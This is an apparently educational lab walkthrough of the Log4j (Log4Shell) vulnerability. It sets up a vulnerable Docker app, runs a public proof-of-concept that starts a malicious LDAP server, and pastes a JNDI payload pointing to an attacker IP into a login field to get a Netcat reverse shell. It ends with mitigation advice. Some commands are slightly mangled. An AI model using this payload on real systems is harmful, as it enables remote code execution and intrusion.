Log4j Vulnerability

  • Many tech stacks are vulnerable because so many tools use the Log4js including infrastructure, dev-tools, and CI/CD products.
  • It cannot be upgraded in a few days as it is the core component of many products like network devices, management consoles, and enterprise software and hardware.
  • The exploit can come through any protocol including API, DNS, or UDP. At this time WAFs are helpless.
  • Once the git clone was completed then we have to enter it into that directory, for that, I have used the command.
  • cd /home/kali/log4j-shell-poc
  • After entering into the log4j directory we have to run the docker command
  • docker build -t log4j-shell-poc.
  • After that run the second command on the GitHub page.
  • Docker run –network host log4j-shell-poc.
  • These commands will enable us to use the docker file with a vulnerable app.
  • Once we complete this command then we have to check whether our web app is built or not.
  • For that, we have to browse our machine IP including the port number i.e 8080.
  • machine ip:8080
  • At last, we found our vulnerable website.
  • Download log4j shell from GitHub, in the same process that we had done in the lab setup (just ignore this step if you are using the same machine as a target and an attacker).
  • Now we need to install the Java JDK version on the machine.
  • This can be downloaded at the following link.
  • Now go to the download folder and unzip the JDK file by executing the following command and later move the extracted file to the /usr/bin folder.
  • After completing these steps we have to exit from the /usr/bin directory and enter into the log4j shell.
  • Let’s check the content of that directory
  • Here I found something interesting that is poc.py.
  • I have opened that file poc.py by using the command: sudo nano poc.py.
  • Here we need to modify ‘./jdk1.8.2.20/’ to ‘/usr/bin/jdk1.8.0_202/.
  • What we have done here is we have changed the path of the java location and the java version in the script.
  • Now let’s initiate a Netcat listener
  • In a terminal make sure you are in the log4j-shell-poc directory when executing the command
  • python3 poc.py — userip 0.0.0.0 — webport 8000 — lport 9001
  • This script started the malicious local LDAP server.
  • Now let’s copy the send me a command that we got from the above image. ${jndi:ldap://192.168.29.163:1389/a}.
  • Paste it in the username field of the browser. This will be our payload.
  • In the password field, we can provide anything.
  • Click on the login button to execute the payload and get back to the Netcat windows where we should get a reverse shell
  • Patching: Internet-facing machines, devices, and services should be patched and updated as soon as the patch/update is released.
  • Visibility: Get an overview of systems and software that may be using Log4j in your environment. Not every Java-dependent machine is vulnerable, but sometimes an old machine, IoT device, or forgotten web service may cause extreme disorder, so make sure to have at least visibility.
  • Isolation: Sometimes patching isn’t available right away. Vulnerable devices and services connected/facing the internet should be isolated from it, and mitigation measures should be applied.
  • Use web application firewalls (WAFs) to filter malicious requests.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
CSCC LABS

CSCC LABS

Cybersecurity Comprehensive Coverage